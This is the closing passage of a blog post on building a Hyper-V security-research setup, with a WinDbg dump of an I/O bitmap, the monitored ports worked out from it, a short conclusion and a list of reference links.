<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Save debug controls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Host address space size</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Acknowledge interrupt on exit</span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For instance, you can see, that for guest-partition the hypervisor handles all input/output (I/O exiting Unconditional), and for the root partition monitors only certain ports (Use I/O bitmaps).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!dc 0x4e06000 L250 - IO_BITMAP_A </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4e06000 00000000 00000003 00000000 00000010 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4e06010 00000000 00000003 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4e06020 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4e06190 00000000 00000000 00000000 f1000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If I am not mistaken in the calculations, then the root-partition monitored ports are 20h, 21h, 44h, A0h, A1h, 1D5Fh, 1D64h, 1D65h, 1D66h, 1D67h.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">closing</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The article describes the steps that must be done to create a stand for the research of Hyper-V, and very briefly describes some aspects of the work of the hypervisor. I hope this information is useful for beginners in hypervisor security researcher at Microsoft.</span></div>
<span style="font-family: "calibri"; font-size: x-small;">Files: <a href="https://drive.google.com/file/d/0B8WEjIxRncDRX1RHc0FQMmozOTg">https://drive.google.com/file/d/0B8WEjIxRncDRX1RHc0FQMmozOTg</a></span><br />
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Sources: </span><br />
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://msdn.microsoft.com/en-us/library/windows/hardware/ff540654(v=vs.85).aspx" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://msdn.microsoft.com/en-us/library/Windows/hardware/ff540654(v=vs.85).aspx</span></a><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://msdn.microsoft.com/en-us/library/cc768520%28v=bts.10%29.aspx" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://msdn.microsoft.com/en-us/library/cc768520%28v=bts.10%29.aspx</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://en.community.dell.com/techcenter/virtualization/w/wiki/3029.aspx" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://en.community.dell.com/techcenter/virtualization/w/wiki/3029.aspx</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://freevirtualserialports.com/" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://freevirtualserialports.com/</span></a><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://ww.osronline.com/showthread.cfm?link=234398" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://ww.osronline.com/showthread.cfm?link=234398</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://download.microsoft.com/download/A/B/4/AB43A34E-BDD0-4FA6-BDEF-79EEF16E880B/Hypervisor%20Top%20Level%20Functional%20Specification%20v4.0.docx" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://download.microsoft.com/download/A/B/4/AB43A34E-BDD0-4FA6-BDEF-79EEF16E880B/Hypervisor%20Top%20Level%20Functional%20Specification%20v4.0.docx</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://alter.org.ua/docs/nt_kernel/procaddr/" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://alter.org.ua/docs/nt_kernel/procaddr/</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://www.osronline.com/showthread.cfm?link=132065" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://www.osronline.com/showthread.cfm?link=132065</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://blog.cr4.sh/2012/07/vmware-gdb-stub-ida.html" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://blog.cr4.sh/2012/07/vmware-gdb-stub-ida.html</span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="color: #0563c1;">The NT Insider (July-Aug 2015)</span></div>
</li>
</ol>
</b></div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.com